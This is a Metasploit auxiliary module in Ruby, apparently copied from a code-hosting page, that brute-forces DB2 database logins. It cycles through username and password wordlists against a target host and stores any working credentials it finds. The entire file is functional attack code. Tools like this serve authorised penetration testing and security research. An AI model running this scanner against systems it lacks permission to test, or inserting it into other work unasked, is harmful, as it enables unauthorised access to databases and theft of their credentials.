Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'metasploit/framework/credential_collection'
7
require 'metasploit/framework/login_scanner/db2'
8

9
class MetasploitModule < Msf::Auxiliary
10
  include Msf::Exploit::Remote::DB2
11
  include Msf::Auxiliary::AuthBrute
12
  include Msf::Auxiliary::Scanner
13
  include Msf::Auxiliary::Report
14

15
  def initialize
16
    super(
17
      'Name'           => 'DB2 Authentication Brute Force Utility',
18
      'Description'    => %q{This module attempts to authenticate against a DB2
19
        instance using username and password combinations indicated by the
20
        USER_FILE, PASS_FILE, and USERPASS_FILE options.},
21
      'Author'         => ['todb'],
22
      'References'     =>
23
        [
24
          [ 'CVE', '1999-0502'] # Weak password
25
        ],
26
      'License'        => MSF_LICENSE
27
    )
28

29
    register_options(
30
      [
31
        Opt::Proxies,
32
        OptPath.new('USERPASS_FILE',  [ false, "File containing (space-separated) users and passwords, one pair per line",
33
          File.join(Msf::Config.data_directory, "wordlists", "db2_default_userpass.txt") ]),
34
        OptPath.new('USER_FILE',  [ false, "File containing users, one per line",
35
          File.join(Msf::Config.data_directory, "wordlists", "db2_default_user.txt") ]),
36
        OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
37
          File.join(Msf::Config.data_directory, "wordlists", "db2_default_pass.txt") ]),
38
      ])
39
  end
40

41
  def run_host(ip)
42
    cred_collection = build_credential_collection(
43
        realm: datastore['DATABASE'],
44
        username: datastore['USERNAME'],
45
        password: datastore['PASSWORD']
46
    )
47

48
    scanner = Metasploit::Framework::LoginScanner::DB2.new(
49
      configure_login_scanner(
50
        host: ip,
51
        port: rport,
52
        proxies: datastore['PROXIES'],
53
        cred_details: cred_collection,
54
        stop_on_success: datastore['STOP_ON_SUCCESS'],
55
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
56
        connection_timeout: 30,
57
        max_send_size: datastore['TCP::max_send_size'],
58
        send_delay: datastore['TCP::send_delay'],
59
        framework: framework,
60
        framework_module: self,
61
        ssl: datastore['SSL'],
62
        ssl_version: datastore['SSLVersion'],
63
        ssl_verify_mode: datastore['SSLVerifyMode'],
64
        ssl_cipher: datastore['SSLCipher'],
65
        local_port: datastore['CPORT'],
66
        local_host: datastore['CHOST']
67
      )
68
    )
69

70
    scanner.scan! do |result|
71
      credential_data = result.to_h
72
      credential_data.merge!(
73
          module_fullname: self.fullname,
74
          workspace_id: myworkspace_id
75
      )
76
      if result.success?
77
        credential_core = create_credential(credential_data)
78
        credential_data[:core] = credential_core
79
        create_credential_login(credential_data)
80

81
        print_good "#{ip}:#{rport} - Login Successful: #{result.credential}"
82
      else
83
        invalidate_login(credential_data)
84
        vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
85
      end
86
    end
87
  end
88
end
89

90